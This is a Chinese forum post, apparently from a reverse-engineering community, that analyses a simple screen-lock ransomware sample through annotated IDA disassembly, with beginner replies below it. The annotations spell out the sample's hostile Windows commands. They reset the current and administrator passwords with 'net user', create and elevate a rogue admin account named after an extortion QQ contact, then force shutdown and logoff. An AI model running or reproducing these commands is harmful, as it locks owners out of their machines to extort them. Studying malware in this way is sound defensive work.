一个简单“锁屏勒索木马”的分析
一个简单“锁屏勒索木马”的分析样本是论坛里轩少的帖子里看到的,发现比较简单,适合小小白学习。样本简单,大神勿喷。。。
样本名称:华夏联盟.exeMD5: 0B1972462EC0041BF9711561CA1A1B45SHA1: 700B448E07738CB82937983CA86C61A82F4E060DCRC32: 5BAD5D4C
木马的主要功能是,将系统当前账户和administrator账户加密,并创建“加QQ1072890578解锁”加密账户,所有账户的登录密码都是107289。以下是木马主体的分析:; =============== S U B R O U T I N E =======================================
.data:00401100
.data:00401100 ; Attributes: bp-based frame
.data:00401100
.data:00401100 public start
.data:00401100 start proc near
.data:00401100
.data:00401100 var_1104 = byte ptr -1104h
.data:00401100 var_1103 = byte ptr -1103h
.data:00401100 var_D04 = byte ptr -0D04h
.data:00401100 var_D03 = byte ptr -0D03h
.data:00401100 var_904 = byte ptr -904h
.data:00401100 var_903 = byte ptr -903h
.data:00401100 CmdLine = byte ptr -504h
.data:00401100 var_503 = byte ptr -503h
.data:00401100 Buffer = byte ptr -104h
.data:00401100 var_103 = byte ptr -103h
.data:00401100 pcbBuffer = dword ptr -4
.data:00401100
.data:00401100 push ebp
.data:00401101 mov ebp, esp
.data:00401103 mov eax, 1104h
.data:00401108 call __alloca_probe; 堆栈空间分配函数
.data:0040110D and , 0
.data:00401114 push ebx
.data:00401115 push esi
.data:00401116 push edi
.data:00401117 push 3Fh
.data:00401119 xor eax, eax
.data:0040111B pop ecx
.data:0040111C lea edi,
.data:00401122 rep stosd
.data:00401124 stosw
.data:00401126 stosb
.data:00401127 lea eax,
.data:0040112A mov , 100h
.data:00401131 push eax ; pcbBuffer 传入的缓冲区宽度
.data:00401132 lea eax,
.data:00401138 push eax ; lpBuffer 传入的缓冲区指针
.data:00401139 call GetUserNameA ; 获取当前用户名
.data:0040113F and , 0
.data:00401146 mov ecx, 0FFh
.data:0040114B xor eax, eax
.data:0040114D lea edi,
.data:00401153 rep stosd
.data:00401155 stosw
.data:00401157 mov ebx, wsprintfA; 将字符串或数值输入到缓冲区
.data:0040115D push offset a107289; "107289"
.data:00401162 stosb
.data:00401163 lea eax, ; 当前用户名
.data:00401169 push eax
.data:0040116A push offset aNetUser ; "net user"
.data:0040116F lea eax,
.data:00401175 push offset aSSS ; 输入格式'%s %s %s'
.data:0040117A push eax ; LPSTR 输入缓冲区
.data:0040117B call ebx ; wsprintfA ; wsprintf($CmdLine,"%s %s %s","net user",当前用户名,"107289")
.data:0040117B ; 字符串作用,为当前用户添加登录密码107289
.data:0040117D mov esi, WinExec
.data:00401183 add esp, 14h
.data:00401186 lea eax,
.data:0040118C push 0 ; uCmdShow 窗口显示方式,0代表隐藏且没有最小化图标的形式
.data:0040118E push eax ; lpCmdLine 指向要执行的命令行字符串
.data:0040118F call esi ; WinExec ; 执行"net user 当前用户名 107289"
.data:00401191 and , 0
.data:00401198 mov ecx, 0FFh
.data:0040119D xor eax, eax
.data:0040119F lea edi,
.data:004011A5 rep stosd
.data:004011A7 stosw
.data:004011A9 stosb
.data:004011AA push offset a107289; "107289"
.data:004011AF push offset aNetUserAdminis ; "net user administrator"
.data:004011B4 lea eax,
.data:004011BA push offset aSS ; "%s %s"
.data:004011BF push eax ; LPSTR
.data:004011C0 call ebx ; wsprintfA ; wsprintf($var_D04,"%s %s","net user administrator","107289")
.data:004011C0 ; 为administrator账户添加密码107289
.data:004011C2 add esp, 10h
.data:004011C5 lea eax,
.data:004011CB push 0 ; uCmdShow
.data:004011CD push eax ; lpCmdLine
.data:004011CE call esi ; WinExec ; 执行字符串"net user administrator 107289"
.data:004011D0 and , 0
.data:004011D7 mov edx, 0FFh
.data:004011DC mov ecx, edx
.data:004011DE xor eax, eax
.data:004011E0 lea edi,
.data:004011E6 and , 0
.data:004011ED rep stosd
.data:004011EF stosw
.data:004011F1 stosb
.data:004011F2 mov ecx, edx
.data:004011F4 xor eax, eax
.data:004011F6 lea edi,
.data:004011FC push offset dword_401080 ; "/add"
.data:00401201 rep stosd
.data:00401203 stosw
.data:00401205 stosb
.data:00401206 mov edi, offset loc_401068
.data:0040120B push offset a107289; "107289"
.data:00401210 push edi ; "加QQ1072890578解锁"
.data:00401211 push offset aNetUser ; "net user"
.data:00401216 push offset aSSSS ; "%s %s %s %s"
.data:0040121B lea eax,
.data:00401221 push eax ; LPSTR
.data:00401222 call ebx ; wsprintfA ; wsprintf($var_904,"%s %s %s %s","net user","加QQ1072890578解锁","107289","/add")
.data:00401224 push offset dword_401080 ; "/add"
.data:00401229 push edi ; 用户名
.data:0040122A push offset aNetLocalgroupA ; "net localgroup administrators"
.data:0040122F lea eax,
.data:00401235 push offset aSSS ; "%s %s %s"
.data:0040123A push eax ; LPSTR
.data:0040123B call ebx ; wsprintfA ; wsprintf($var_1104,"%s %s %s","net localgroup administrators","加QQ1072890578解锁","/add")
.data:0040123D add esp, 2Ch
.data:00401240 xor ebx, ebx
.data:00401242 lea eax,
.data:00401248 push ebx ; uCmdShow
.data:00401249 push eax ; lpCmdLine
.data:0040124A call esi ; WinExec ; 执行字符串"net user 加QQ1072890578解锁 107289 /add",创建一个带密码的用户
.data:0040124C mov edi, Sleep
.data:00401252 push 0BB8h ; dwMilliseconds
.data:00401257 call edi ; Sleep
.data:00401259 lea eax,
.data:0040125F push ebx ; uCmdShow
.data:00401260 push eax ; lpCmdLine
.data:00401261 call esi ; WinExec ; 执行"net localgroup administrators 加QQ1072890578解锁 /add",将新创建的用户添加到管理员,获取管理员权限
.data:00401263 push 1388h ; dwMilliseconds
.data:00401268 call edi ; Sleep
.data:0040126A push ebx ; uCmdShow
.data:0040126B push offset CmdLine; "shutdown -s -t 0"
.data:00401270 call esi ; WinExec ; 关机
.data:00401272 push ebx ; uCmdShow
.data:00401273 push offset aLogoff; "logoff"
.data:00401278 call esi ; WinExec ; 注销
.data:0040127A pop edi
.data:0040127B pop esi
.data:0040127C xor eax, eax
.data:0040127E pop ebx
.data:0040127F leave
.data:00401280 retn 10h
.data:00401280 start endp
第一次在吾爱发帖,虽然样本很简单,还是有点激动,希望能跟大神们多学习。。。样本密码52pojie
ican2015大大謝謝你的分享先~
看你一貼,獲益良多.先慢慢看你的貼消化一下先~~
正在學習中,努力中~~ 路过支持下,一起学习 还是学习了!!! 可以去研究一下,谢谢楼主了 用什么分析的? 对于尚未入门的我来说,这是一个不错的引导~~! 我来让你锁一锁 我受教了 完美剿灭OVG 发表于 2016-3-16 16:04
用什么分析的?
因为样本简单,所以只用了IDA